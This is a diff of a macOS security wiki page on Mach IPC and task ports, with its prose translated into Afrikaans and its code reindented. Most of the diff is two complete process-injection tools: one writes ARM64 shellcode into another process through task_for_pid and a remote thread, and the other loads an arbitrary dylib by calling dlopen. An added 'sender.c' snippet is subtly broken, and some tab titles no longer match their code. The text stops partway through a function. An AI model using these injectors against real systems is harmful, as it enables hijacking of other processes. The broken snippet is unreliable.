!= KERN_SUCCESS) { - printf("mach_msg() failed with code 0x%x\n", kr); - return 1; - } - printf("Got a message\n"); +kr = mach_msg( +&message.header, // Same as (mach_msg_header_t *) &message. +MACH_RCV_MSG, // Options. We're receiving a message. +0, // Size of the message being sent, if sending. +sizeof(message), // Size of the buffer for receiving. +port, // The port to receive a message on. +MACH_MSG_TIMEOUT_NONE, +MACH_PORT_NULL // Port for the kernel to send notifications about this message to. +); +if (kr != KERN_SUCCESS) { +printf("mach_msg() failed with code 0x%x\n", kr); +return 1; +} +printf("Got a message\n"); - message.some_text[9] = 0; - printf("Text: %s, number: %d\n", message.some_text, message.some_number); +message.some_text[9] = 0; +printf("Text: %s, number: %d\n", message.some_text, message.some_number); } ``` +{% tab title="sender.c" %} + +```c +#include +#include +#include +#include +#include +#include + +int main(int argc, char *argv[]) { + mach_port_t server_port; + kern_return_t kr; + char message[256]; + + if (argc != 2) { + printf("Usage: %s \n", argv[0]); + return 1; + } + + // Connect to the server port + kr = task_get_special_port(mach_task_self(), TASK_AUDIT_PORT, &server_port); + if (kr != KERN_SUCCESS) { + printf("Failed to get server port: %s\n", mach_error_string(kr)); + return 1; + } + + // Copy the message to the server + strncpy(message, argv[1], sizeof(message)); + + // Send the message to the server + kr = mach_msg((mach_msg_header_t *)&message, MACH_SEND_MSG, sizeof(message), 0, MACH_PORT_NULL, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL); + if (kr != KERN_SUCCESS) { + printf("Failed to send message: %s\n", mach_error_string(kr)); + return 1; + } + + printf("Message sent successfully\n"); + + return 0; +} +``` + {% endtab %} -{% tab title="sender.c" %} +{% tab title="receiver.c" %} ```c // Code from https://docs.darlinghq.org/internals/macos-specifics/mach-ports.html // gcc sender.c -o sender @@ -195,66 +234,66 @@ int main() { int main() { - // Lookup the receiver port using the bootstrap server. - mach_port_t port; - kern_return_t kr = bootstrap_look_up(bootstrap_port, "org.darlinghq.example", &port); - if (kr != KERN_SUCCESS) { - printf("bootstrap_look_up() failed with code 0x%x\n", kr); - return 1; - } - printf("bootstrap_look_up() returned port right name %d\n", port); +// Lookup the receiver port using the bootstrap server. +mach_port_t port; +kern_return_t kr = bootstrap_look_up(bootstrap_port, "org.darlinghq.example", &port); +if (kr != KERN_SUCCESS) { +printf("bootstrap_look_up() failed with code 0x%x\n", kr); +return 1; +} +printf("bootstrap_look_up() returned port right name %d\n", port); - // Construct our message. - struct { - mach_msg_header_t header; - char some_text[10]; - int some_number; - } message; +// Construct our message. +struct { +mach_msg_header_t header; +char some_text[10]; +int some_number; +} message; - message.header.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0); - message.header.msgh_remote_port = port; - message.header.msgh_local_port = MACH_PORT_NULL; +message.header.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0); +message.header.msgh_remote_port = port; +message.header.msgh_local_port = MACH_PORT_NULL; - strncpy(message.some_text, "Hello", sizeof(message.some_text)); - message.some_number = 35; +strncpy(message.some_text, "Hello", sizeof(message.some_text)); +message.some_number = 35; - // Send the message. - kr = mach_msg( - &message.header, // Same as (mach_msg_header_t *) &message. - MACH_SEND_MSG, // Options. We're sending a message. - sizeof(message), // Size of the message being sent. - 0, // Size of the buffer for receiving. - MACH_PORT_NULL, // A port to receive a message on, if receiving. - MACH_MSG_TIMEOUT_NONE, - MACH_PORT_NULL // Port for the kernel to send notifications about this message to. - ); - if (kr != KERN_SUCCESS) { - printf("mach_msg() failed with code 0x%x\n", kr); - return 1; - } - printf("Sent a message\n"); +// Send the message. +kr = mach_msg( +&message.header, // Same as (mach_msg_header_t *) &message. +MACH_SEND_MSG, // Options. We're sending a message. +sizeof(message), // Size of the message being sent. +0, // Size of the buffer for receiving. +MACH_PORT_NULL, // A port to receive a message on, if receiving. +MACH_MSG_TIMEOUT_NONE, +MACH_PORT_NULL // Port for the kernel to send notifications about this message to. +); +if (kr != KERN_SUCCESS) { +printf("mach_msg() failed with code 0x%x\n", kr); +return 1; +} +printf("Sent a message\n"); } ``` {% endtab %} {% endtabs %} -### Privileged Ports +### Bevoorregte poorte -* **Host port**: If a process has **Send** privilege over this port he can get **information** about the **system** (e.g. `host_processor_info`). -* **Host priv port**: A process with **Send** right over this port can perform **privileged actions** like loading a kernel extension. The **process need to be root** to get this permission. - * Moreover, in order to call **`kext_request`** API it's needed to have other entitlements **`com.apple.private.kext*`** which are only given to Apple binaries. -* **Task name port:** An unprivileged version of the _task port_. It references the task, but does not allow controlling it. The only thing that seems to be available through it is `task_info()`. -* **Task port** (aka kernel port)**:** With Send permission over this port it's possible to control the task (read/write memory, create threads...). - * Call `mach_task_self()` to **get the name** for this port for the caller task. This port is only **inherited** across **`exec()`**; a new task created with `fork()` gets a new task port (as a special case, a task also gets a new task port after `exec()`in a suid binary). The only way to spawn a task and get its port is to perform the ["port swap dance"](https://robert.sesek.com/2014/1/changes\_to\_xnu\_mach\_ipc.html) while doing a `fork()`. - * These are the restrictions to access the port (from `macos_task_policy` from the binary `AppleMobileFileIntegrity`): - * If the app has **`com.apple.security.get-task-allow` entitlement** processes from the **same user can access the task port** (commonly added by Xcode for debugging). The **notarization** process won't allow it to production releases. - * Apps with the **`com.apple.system-task-ports`** entitlement can get the **task port for any** process, except the kernel. In older versions it was called **`task_for_pid-allow`**. This is only granted to Apple applications. - * **Root can access task ports** of applications **not** compiled with a **hardened** runtime (and not from Apple). +* **Gasheerpoort**: As 'n proses **Send**-bevoegdheid oor hierdie poort het, kan hy **inligting** oor die **sisteem** kry (bv. `host_processor_info`). +* **Gasheerprivaatpoort**: 'n Proses met **Send**-reg oor hierdie poort kan **bevoorregte aksies** uitvoer, soos die laai van 'n kernuitbreiding. Die **proses moet root wees** om hierdie toestemming te kry. +* Verder, om die **`kext_request`** API te roep, is dit nodig om ander toekennings **`com.apple.private.kext*`** te hê wat slegs aan Apple-binêre gegee word. +* **Taaknaampoort**: 'n Onbevoorregte weergawe van die _taakpoort_. Dit verwys na die taak, maar laat nie beheer daaroor toe nie. Die enigste ding wat beskikbaar lyk deur dit is `task_info()`. +* **Taakpoort** (ook bekend as kernpoort)**:** Met Send-toestemming oor hierdie poort is dit moontlik om die taak te beheer (lees/skryf geheue, skep drade...). +* Roep `mach_task_self()` om die naam vir hierdie poort vir die aanroeperstaak te **kry**. Hierdie poort word slegs **oorgeërf** met **`exec()`**; 'n nuwe taak wat met `fork()` geskep is, kry 'n nuwe taakpoort (as 'n spesiale geval kry 'n taak ook 'n nuwe taakpoort na `exec()` in 'n suid-binêre). Die enigste manier om 'n taak te skep en sy poort te kry, is om die ["poortruil-dans"](https://robert.sesek.com/2014/1/changes\_to\_xnu\_mach\_ipc.html) uit te voer terwyl 'n `fork()` gedoen word. +* Hier is die beperkings om toegang tot die poort te verkry (vanaf `macos_task_policy` van die binêre `AppleMobileFileIntegrity`): +* As die toepassing die **`com.apple.security.get-task-allow` toekenning** het, kan prosesse van dieselfde gebruiker toegang tot die taakpoort verkry (gewoonlik deur Xcode by te voeg vir foutopsporing). Die **notarisering**-proses sal dit nie toelaat vir produksievrystellings nie. +* Toepassings met die **`com.apple.system-task-ports`** toekenning kan die **taakpoort vir enige** proses kry, behalwe die kernel. In ouer weergawes is dit genoem **`task_for_pid-allow`**. Dit word slegs aan Apple-toepassings toegeken. +* **Root kan taakpoorte** van toepassings **wat nie** met 'n **verhard**-uitvoertyd gekompileer is nie (en nie van Apple af nie) toegang verkry. -### Shellcode Injection in thread via Task port +### Shellcode-inspuiting in draad via Taakpoort -You can grab a shellcode from: +Jy kan 'n shellcode kry vanaf: {% content-ref url="../../macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md" %} [arm64-basic-assembly.md](../../macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md) @@ -269,49 +308,46 @@ You can grab a shellcode from: #import double performMathOperations() { - double result = 0; - for (int i = 0; i < 10000; i++) { - result += sqrt(i) * tan(i) - cos(i); - } - return result; +double result = 0; +for (int i = 0; i < 10000; i++) { +result += sqrt(i) * tan(i) - cos(i); +} +return result; } int main(int argc, const char * argv[]) { - @autoreleasepool { - NSLog(@"Process ID: %d", [[NSProcessInfo processInfo] +@autoreleasepool { +NSLog(@"Process ID: %d", [[NSProcessInfo processInfo] processIdentifier]); - while (true) { - [NSThread sleepForTimeInterval:5]; +while (true) { +[NSThread sleepForTimeInterval:5]; - performMathOperations(); // Silent action +performMathOperations(); // Silent action - [NSThread sleepForTimeInterval:5]; - } - } - return 0; +[NSThread sleepForTimeInterval:5]; +} +} +return 0; } ``` -{% endtab %} - {% tab title="entitlements.plist" %} ```xml - com.apple.security.get-task-allow - +com.apple.security.get-task-allow + ``` {% endtab %} {% endtabs %} -**Compile** the previous program and add the **entitlements** to be able to inject code with the same user (if not you will need to use **sudo**). +**Kompileer** die vorige program en voeg die **toekennings** by om in staat te wees om kode in te spuit met dieselfde gebruiker (as jy nie dit doen nie, sal jy **sudo** moet gebruik).
sc_injector.m - ```objectivec // gcc -framework Foundation -framework Appkit sc_injector.m -o sc_injector @@ -325,18 +361,18 @@ processIdentifier]); kern_return_t mach_vm_allocate ( - vm_map_t target, - mach_vm_address_t *address, - mach_vm_size_t size, - int flags +vm_map_t target, +mach_vm_address_t *address, +mach_vm_size_t size, +int flags ); kern_return_t mach_vm_write ( - vm_map_t target_task, - mach_vm_address_t address, - vm_offset_t data, - mach_msg_type_number_t dataCnt +vm_map_t target_task, +mach_vm_address_t address, +vm_offset_t data, +mach_msg_type_number_t dataCnt ); @@ -354,177 +390,174 @@ char injectedCode[] = "\xff\x03\x01\xd1\xe1\x03\x00\x91\x60\x01\x00\x10\x20\x00\ int inject(pid_t pid){ - task_t remoteTask; +task_t remoteTask; - // Get access to the task port of the process we want to inject into - kern_return_t kr = task_for_pid(mach_task_self(), pid, &remoteTask); - if (kr != KERN_SUCCESS) { - fprintf (stderr, "Unable to call task_for_pid on pid %d: %d. Cannot continue!\n",pid, kr); - return (-1); - } - else{ - printf("Gathered privileges over the task port of process: %d\n", pid); - } +// Get access to the task port of the process we want to inject into +kern_return_t kr = task_for_pid(mach_task_self(), pid, &remoteTask); +if (kr != KERN_SUCCESS) { +fprintf (stderr, "Unable to call task_for_pid on pid %d: %d. Cannot continue!\n",pid, kr); +return (-1); +} +else{ +printf("Gathered privileges over the task port of process: %d\n", pid); +} - // Allocate memory for the stack - mach_vm_address_t remoteStack64 = (vm_address_t) NULL; - mach_vm_address_t remoteCode64 = (vm_address_t) NULL; - kr = mach_vm_allocate(remoteTask, &remoteStack64, STACK_SIZE, VM_FLAGS_ANYWHERE); - - if (kr != KERN_SUCCESS) - { - fprintf(stderr,"Unable to allocate memory for remote stack in thread: Error %s\n", mach_error_string(kr)); - return (-2); - } - else - { +// Allocate memory for the stack +mach_vm_address_t remoteStack64 = (vm_address_t) NULL; +mach_vm_address_t remoteCode64 = (vm_address_t) NULL; +kr = mach_vm_allocate(remoteTask, &remoteStack64, STACK_SIZE, VM_FLAGS_ANYWHERE); - fprintf (stderr, "Allocated remote stack @0x%llx\n", remoteStack64); - } - - // Allocate memory for the code - remoteCode64 = (vm_address_t) NULL; - kr = mach_vm_allocate( remoteTask, &remoteCode64, CODE_SIZE, VM_FLAGS_ANYWHERE ); +if (kr != KERN_SUCCESS) +{ +fprintf(stderr,"Unable to allocate memory for remote stack in thread: Error %s\n", mach_error_string(kr)); +return (-2); +} +else +{ - if (kr != KERN_SUCCESS) - { - fprintf(stderr,"Unable to allocate memory for remote code in thread: Error %s\n", mach_error_string(kr)); - return (-2); - } - +fprintf (stderr, "Allocated remote stack @0x%llx\n", remoteStack64); +} - // Write the shellcode to the allocated memory - kr = mach_vm_write(remoteTask, // Task port - remoteCode64, // Virtual Address (Destination) - (vm_address_t) injectedCode, // Source - 0xa9); // Length of the source +// Allocate memory for the code +remoteCode64 = (vm_address_t) NULL; +kr = mach_vm_allocate( remoteTask, &remoteCode64, CODE_SIZE, VM_FLAGS_ANYWHERE ); + +if (kr != KERN_SUCCESS) +{ +fprintf(stderr,"Unable to allocate memory for remote code in thread: Error %s\n", mach_error_string(kr)); +return (-2); +} - if (kr != KERN_SUCCESS) - { - fprintf(stderr,"Unable to write remote thread memory: Error %s\n", mach_error_string(kr)); - return (-3); - } +// Write the shellcode to the allocated memory +kr = mach_vm_write(remoteTask, // Task port +remoteCode64, // Virtual Address (Destination) +(vm_address_t) injectedCode, // Source +0xa9); // Length of the source - // Set the permissions on the allocated code memory - kr = vm_protect(remoteTask, remoteCode64, 0x70, FALSE, VM_PROT_READ | VM_PROT_EXECUTE); +if (kr != KERN_SUCCESS) +{ +fprintf(stderr,"Unable to write remote thread memory: Error %s\n", mach_error_string(kr)); +return (-3); +} - if (kr != KERN_SUCCESS) - { - fprintf(stderr,"Unable to set memory permissions for remote thread's code: Error %s\n", mach_error_string(kr)); - return (-4); - } - // Set the permissions on the allocated stack memory - kr = vm_protect(remoteTask, remoteStack64, STACK_SIZE, TRUE, VM_PROT_READ | VM_PROT_WRITE); - - if (kr != KERN_SUCCESS) - { - fprintf(stderr,"Unable to set memory permissions for remote thread's stack: Error %s\n", mach_error_string(kr)); - return (-4); - } +// Set the permissions on the allocated code memory +kr = vm_protect(remoteTask, remoteCode64, 0x70, FALSE, VM_PROT_READ | VM_PROT_EXECUTE); - // Create thread to run shellcode - struct arm_unified_thread_state remoteThreadState64; - thread_act_t remoteThread; +if (kr != KERN_SUCCESS) +{ +fprintf(stderr,"Unable to set memory permissions for remote thread's code: Error %s\n", mach_error_string(kr)); +return (-4); +} - memset(&remoteThreadState64, '\0', sizeof(remoteThreadState64) ); +// Set the permissions on the allocated stack memory +kr = vm_protect(remoteTask, remoteStack64, STACK_SIZE, TRUE, VM_PROT_READ | VM_PROT_WRITE); - remoteStack64 += (STACK_SIZE / 2); // this is the real stack - //remoteStack64 -= 8; // need alignment of 16 +if (kr != KERN_SUCCESS) +{ +fprintf(stderr,"Unable to set memory permissions for remote thread's stack: Error %s\n", mach_error_string(kr)); +return (-4); +} - const char* p = (const char*) remoteCode64; +// Create thread to run shellcode +struct arm_unified_thread_state remoteThreadState64; +thread_act_t remoteThread; - remoteThreadState64.ash.flavor = ARM_THREAD_STATE64; - remoteThreadState64.ash.count = ARM_THREAD_STATE64_COUNT; - remoteThreadState64.ts_64.__pc = (u_int64_t) remoteCode64; - remoteThreadState64.ts_64.__sp = (u_int64_t) remoteStack64; +memset(&remoteThreadState64, '\0', sizeof(remoteThreadState64) ); - printf ("Remote Stack 64 0x%llx, Remote code is %p\n", remoteStack64, p ); +remoteStack64 += (STACK_SIZE / 2); // this is the real stack +//remoteStack64 -= 8; // need alignment of 16 - kr = thread_create_running(remoteTask, ARM_THREAD_STATE64, // ARM_THREAD_STATE64, - (thread_state_t) &remoteThreadState64.ts_64, ARM_THREAD_STATE64_COUNT , &remoteThread ); +const char* p = (const char*) remoteCode64; - if (kr != KERN_SUCCESS) { - fprintf(stderr,"Unable to create remote thread: error %s", mach_error_string (kr)); - return (-3); - } +remoteThreadState64.ash.flavor = ARM_THREAD_STATE64; +remoteThreadState64.ash.count = ARM_THREAD_STATE64_COUNT; +remoteThreadState64.ts_64.__pc = (u_int64_t) remoteCode64; +remoteThreadState64.ts_64.__sp = (u_int64_t) remoteStack64; - return (0); +printf ("Remote Stack 64 0x%llx, Remote code is %p\n", remoteStack64, p ); + +kr = thread_create_running(remoteTask, ARM_THREAD_STATE64, // ARM_THREAD_STATE64, +(thread_state_t) &remoteThreadState64.ts_64, ARM_THREAD_STATE64_COUNT , &remoteThread ); + +if (kr != KERN_SUCCESS) { +fprintf(stderr,"Unable to create remote thread: error %s", mach_error_string (kr)); +return (-3); +} + +return (0); } pid_t pidForProcessName(NSString *processName) { - NSArray *arguments = @[@"pgrep", processName]; - NSTask *task = [[NSTask alloc] init]; - [task setLaunchPath:@"/usr/bin/env"]; - [task setArguments:arguments]; +NSArray *arguments = @[@"pgrep", processName]; +NSTask *task = [[NSTask alloc] init]; +[task setLaunchPath:@"/usr/bin/env"]; +[task setArguments:arguments]; - NSPipe *pipe = [NSPipe pipe]; - [task setStandardOutput:pipe]; +NSPipe *pipe = [NSPipe pipe]; +[task setStandardOutput:pipe]; - NSFileHandle *file = [pipe fileHandleForReading]; +NSFileHandle *file = [pipe fileHandleForReading]; - [task launch]; +[task launch]; - NSData *data = [file readDataToEndOfFile]; - NSString *string = [[NSString alloc] initWithData:data encoding:NSUTF8StringEncoding]; +NSData *data = [file readDataToEndOfFile]; +NSString *string = [[NSString alloc] initWithData:data encoding:NSUTF8StringEncoding]; - return (pid_t)[string integerValue]; +return (pid_t)[string integerValue]; } BOOL isStringNumeric(NSString *str) { - NSCharacterSet* nonNumbers = [[NSCharacterSet decimalDigitCharacterSet] invertedSet]; - NSRange r = [str rangeOfCharacterFromSet: nonNumbers]; - return r.location == NSNotFound; +NSCharacterSet* nonNumbers = [[NSCharacterSet decimalDigitCharacterSet] invertedSet]; +NSRange r = [str rangeOfCharacterFromSet: nonNumbers]; +return r.location == NSNotFound; } int main(int argc, const char * argv[]) { - @autoreleasepool { - if (argc < 2) { - NSLog(@"Usage: %s ", argv[0]); - return 1; - } +@autoreleasepool { +if (argc < 2) { +NSLog(@"Usage: %s ", argv[0]); +return 1; +} - NSString *arg = [NSString stringWithUTF8String:argv[1]]; - pid_t pid; +NSString *arg = [NSString stringWithUTF8String:argv[1]]; +pid_t pid; - if (isStringNumeric(arg)) { - pid = [arg intValue]; - } else { - pid = pidForProcessName(arg); - if (pid == 0) { - NSLog(@"Error: Process named '%@' not found.", arg); - return 1; - } - else{ - printf("Found PID of process '%s': %d\n", [arg UTF8String], pid); - } - } +if (isStringNumeric(arg)) { +pid = [arg intValue]; +} else { +pid = pidForProcessName(arg); +if (pid == 0) { +NSLog(@"Error: Process named '%@' not found.", arg); +return 1; +} +else{ +printf("Found PID of process '%s': %d\n", [arg UTF8String], pid); +} +} - inject(pid); - } +inject(pid); +} - return 0; +return 0; } ``` -
- ```bash gcc -framework Foundation -framework Appkit sc_inject.m -o sc_inject ./inject ``` +### Dylib Injeksie in draad via Taakpoort -### Dylib Injection in thread via Task port +In macOS kan **drade** gemanipuleer word deur **Mach** of deur die gebruik van die **posix `pthread` api**. Die draad wat ons in die vorige injeksie gegenereer het, is gegenereer met behulp van die Mach api, so dit is **nie posix voldoenend nie**. -In macOS **threads** might be manipulated via **Mach** or using **posix `pthread` api**. The thread we generated in the previos injection, was generated using Mach api, so **it's not posix compliant**. +Dit was moontlik om 'n eenvoudige shellcode in te spuit om 'n bevel uit te voer omdat dit nie met posix voldoenende api's hoef te werk nie, slegs met Mach. **Meer komplekse injeksies** sal egter vereis dat die draad ook **posix voldoenend** is. -It was possible to **inject a simple shellcode** to execute a command because it **didn't need to work with posix** compliant apis, only with Mach. **More complex injections** would need the **thread** to be also **posix compliant**. +Om die draad te **verbeter**, moet dit die **`pthread_create_from_mach_thread`** roep wat 'n geldige pthread sal skep. Hierdie nuwe pthread kan dan **dlopen** oproep om 'n dylib van die stelsel te laai, sodat dit moontlik is om aangepaste biblioteke te laai in plaas daarvan om nuwe shellcode te skryf om verskillende aksies uit te voer. -Therefore, to **improve the thread** it should call **`pthread_create_from_mach_thread`** which will **create a valid pthread**. Then, this new pthread could **call dlopen** to **load a dylib** from the system, so instead of writing new shellcode to perform different actions it's possible to load custom libraries. - -You can find **example dylibs** in (for example the one that generates a log and then you can listen to it): +Jy kan **voorbeeld dylibs** vind in (byvoorbeeld die een wat 'n log genereer en dan kan jy daarna luister): {% content-ref url="../../macos-dyld-hijacking-and-dyld_insert_libraries.md" %} [macos-dyld-hijacking-and-dyld\_insert\_libraries.md](../../macos-dyld-hijacking-and-dyld\_insert\_libraries.md) @@ -533,7 +566,6 @@ You can find **example dylibs** in (for example the one that generates a log and
dylib_injector.m - ```objectivec // gcc -framework Foundation -framework Appkit dylib_injector.m -o dylib_injector // Based on http://newosxbook.com/src.jl?tree=listings&file=inject.c @@ -559,18 +591,18 @@ You can find **example dylibs** in (for example the one that generates a log and // And I say, bullshit. kern_return_t mach_vm_allocate ( - vm_map_t target, - mach_vm_address_t *address, - mach_vm_size_t size, - int flags +vm_map_t target, +mach_vm_address_t *address, +mach_vm_size_t size, +int flags ); kern_return_t mach_vm_write ( - vm_map_t target_task, - mach_vm_address_t address, - vm_offset_t data, - mach_msg_type_number_t dataCnt +vm_map_t target_task, +mach_vm_address_t address, +vm_offset_t data, +mach_msg_type_number_t dataCnt ); @@ -585,266 +617,262 @@ kern_return_t mach_vm_write char injectedCode[] = - // "\x00\x00\x20\xd4" // BRK X0 ; // useful if you need a break :) +// "\x00\x00\x20\xd4" // BRK X0 ; // useful if you need a break :) - // Call pthread_set_self +// Call pthread_set_self - "\xff\x83\x00\xd1" // SUB SP, SP, #0x20 ; Allocate 32 bytes of space on the stack for local variables - "\xFD\x7B\x01\xA9" // STP X29, X30, [SP, #0x10] ; Save frame pointer and link register on the stack - "\xFD\x43\x00\x91" // ADD X29, SP, #0x10 ; Set frame pointer to current stack pointer - "\xff\x43\x00\xd1" // SUB SP, SP, #0x10 ; Space for the - "\xE0\x03\x00\x91" // MOV X0, SP ; (arg0)Store in the stack the thread struct - "\x01\x00\x80\xd2" // MOVZ X1, 0 ; X1 (arg1) = 0; - "\xA2\x00\x00\x10" // ADR X2, 0x14 ; (arg2)12bytes from here, Address where the new thread should start - "\x03\x00\x80\xd2" // MOVZ X3, 0 ; X3 (arg3) = 0; - "\x68\x01\x00\x58" // LDR X8, #44 ; load address of PTHRDCRT (pthread_create_from_mach_thread) - "\x00\x01\x3f\xd6" // BLR X8 ; call pthread_create_from_mach_thread - "\x00\x00\x00\x14" // loop: b loop ; loop forever +"\xff\x83\x00\xd1" // SUB SP, SP, #0x20 ; Allocate 32 bytes of space on the stack for local variables +"\xFD\x7B\x01\xA9" // STP X29, X30, [SP, #0x10] ; Save frame pointer and link register on the stack +"\xFD\x43\x00\x91" // ADD X29, SP, #0x10 ; Set frame pointer to current stack pointer +"\xff\x43\x00\xd1" // SUB SP, SP, #0x10 ; Space for the +"\xE0\x03\x00\x91" // MOV X0, SP ; (arg0)Store in the stack the thread struct +"\x01\x00\x80\xd2" // MOVZ X1, 0 ; X1 (arg1) = 0; +"\xA2\x00\x00\x10" // ADR X2, 0x14 ; (arg2)12bytes from here, Address where the new thread should start +"\x03\x00\x80\xd2" // MOVZ X3, 0 ; X3 (arg3) = 0; +"\x68\x01\x00\x58" // LDR X8, #44 ; load address of PTHRDCRT (pthread_create_from_mach_thread) +"\x00\x01\x3f\xd6" // BLR X8 ; call pthread_create_from_mach_thread +"\x00\x00\x00\x14" // loop: b loop ; loop forever - // Call dlopen with the path to the library - "\xC0\x01\x00\x10" // ADR X0, #56 ; X0 => "LIBLIBLIB..."; - "\x68\x01\x00\x58" // LDR X8, #44 ; load DLOPEN - "\x01\x00\x80\xd2" // MOVZ X1, 0 ; X1 = 0; - "\x29\x01\x00\x91" // ADD x9, x9, 0 - I left this as a nop - "\x00\x01\x3f\xd6" // BLR X8 ; do dlopen() - - // Call pthread_exit - "\xA8\x00\x00\x58" // LDR X8, #20 ; load PTHREADEXT - "\x00\x00\x80\xd2" // MOVZ X0, 0 ; X1 = 0; - "\x00\x01\x3f\xd6" // BLR X8 ; do pthread_exit - - "PTHRDCRT" // <- - "PTHRDEXT" // <- - "DLOPEN__" // <- - "LIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIB" - "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" - "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" - "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" - "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" - "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" ; +// Call dlopen with the path to the library +"\xC0\x01\x00\x10" // ADR X0, #56 ; X0 => "LIBLIBLIB..."; +"\x68\x01\x00\x58" // LDR X8, #44 ; load DLOPEN +"\x01\x00\x80\xd2" // MOVZ X1, 0 ; X1 = 0; +"\x29\x01\x00\x91" // ADD x9, x9, 0 - I left this as a nop +"\x00\x01\x3f\xd6" // BLR X8 ; do dlopen() + +// Call pthread_exit +"\xA8\x00\x00\x58" // LDR X8, #20 ; load PTHREADEXT +"\x00\x00\x80\xd2" // MOVZ X0, 0 ; X1 = 0; +"\x00\x01\x3f\xd6" // BLR X8 ; do pthread_exit + +"PTHRDCRT" // <- +"PTHRDEXT" // <- +"DLOPEN__" // <- +"LIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIB" +"\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" +"\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" +"\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" +"\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" +"\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" ; int inject(pid_t pid, const char *lib) { - task_t remoteTask; - struct stat buf; +task_t remoteTask; +struct stat buf; - // Check if the library exists - int rc = stat (lib, &buf); +// Check if the library exists +int rc = stat (lib, &buf); - if (rc != 0) - { - fprintf (stderr, "Unable to open library file %s (%s) - Cannot inject\n", lib,strerror (errno)); - //return (-9); - } +if (rc != 0) +{ +fprintf (stderr, "Unable to open library file %s (%s) - Cannot inject\n", lib,strerror (errno)); +//return (-9); +} - // Get access to the task port of the process we want to inject into - kern_return_t kr = task_for_pid(mach_task_self(), pid, &remoteTask); - if (kr != KERN_SUCCESS) { - fprintf (stderr, "Unable to call task_for_pid on pid %d: %d. Cannot continue!\n",pid, kr); - return (-1); - } - else{ - printf("Gathered privileges over the task port of process: %d\n", pid); - } +// Get access to the task port of the process we want to inject into +kern_return_t kr = task_for_pid(mach_task_self(), pid, &remoteTask); +if (kr != KERN_SUCCESS) { +fprintf (stderr, "Unable to call task_for_pid on pid %d: %d. Cannot continue!\n",pid, kr); +return (-1); +} +else{ +printf("Gathered privileges over the task port of process: %d\n", pid); +} - // Allocate memory for the stack - mach_vm_address_t remoteStack64 = (vm_address_t) NULL; - mach_vm_address_t remoteCode64 = (vm_address_t) NULL; - kr = mach_vm_allocate(remoteTask, &remoteStack64, STACK_SIZE, VM_FLAGS_ANYWHERE); - - if (kr != KERN_SUCCESS) - { - fprintf(stderr,"Unable to allocate memory for remote stack in thread: Error %s\n", mach_error_string(kr)); - return (-2); - } - else - { +// Allocate memory for the stack +mach_vm_address_t remoteStack64 = (vm_address_t) NULL; +mach_vm_address_t remoteCode64 = (vm_address_t) NULL; +kr = mach_vm_allocate(remoteTask, &remoteStack64, STACK_SIZE, VM_FLAGS_ANYWHERE); - fprintf (stderr, "Allocated remote stack @0x%llx\n", remoteStack64); - } - - // Allocate memory for the code - remoteCode64 = (vm_address_t) NULL; - kr = mach_vm_allocate( remoteTask, &remoteCode64, CODE_SIZE, VM_FLAGS_ANYWHERE ); +if (kr != KERN_SUCCESS) +{ +fprintf(stderr,"Unable to allocate memory for remote stack in thread: Error %s\n", mach_error_string(kr)); +return (-2); +} +else +{ - if (kr != KERN_SUCCESS) - { - fprintf(stderr,"Unable to allocate memory for remote code in thread: Error %s\n", mach_error_string(kr)); - return (-2); - } +fprintf (stderr, "Allocated remote stack @0x%llx\n", remoteStack64); +} - - // Patch shellcode +// Allocate memory for the code +remoteCode64 = (vm_address_t) NULL; +kr = mach_vm_allocate( remoteTask, &remoteCode64, CODE_SIZE, VM_FLAGS_ANYWHERE ); - int i = 0; - char *possiblePatchLocation = (injectedCode ); - for (i = 0 ; i < 0x100; i++) - { - - // Patching is crude, but works. - // - extern void *_pthread_set_self; - possiblePatchLocation++; - - - uint64_t addrOfPthreadCreate = dlsym ( RTLD_DEFAULT, "pthread_create_from_mach_thread"); //(uint64_t) pthread_create_from_mach_thread; - uint64_t addrOfPthreadExit = dlsym (RTLD_DEFAULT, "pthread_exit"); //(uint64_t) pthread_exit; - uint64_t addrOfDlopen = (uint64_t) dlopen; - - if (memcmp (possiblePatchLocation, "PTHRDEXT", 8) == 0) - { - memcpy(possiblePatchLocation, &addrOfPthreadExit,8); - printf ("Pthread exit @%llx, %llx\n", addrOfPthreadExit, pthread_exit); - } - - if (memcmp (possiblePatchLocation, "PTHRDCRT", 8) == 0) - { - memcpy(possiblePatchLocation, &addrOfPthreadCreate,8); - printf ("Pthread create from mach thread @%llx\n", addrOfPthreadCreate); - } - - if (memcmp(possiblePatchLocation, "DLOPEN__", 6) == 0) - { - printf ("DLOpen @%llx\n", addrOfDlopen); - memcpy(possiblePatchLocation, &addrOfDlopen, sizeof(uint64_t)); - } - - if (memcmp(possiblePatchLocation, "LIBLIBLIB", 9) == 0) - { - strcpy(possiblePatchLocation, lib ); - } - } - - // Write the shellcode to the allocated memory - kr = mach_vm_write(remoteTask, // Task port - remoteCode64, // Virtual Address (Destination) - (vm_address_t) injectedCode, // Source - 0xa9); // Length of the source +if (kr != KERN_SUCCESS) +{ 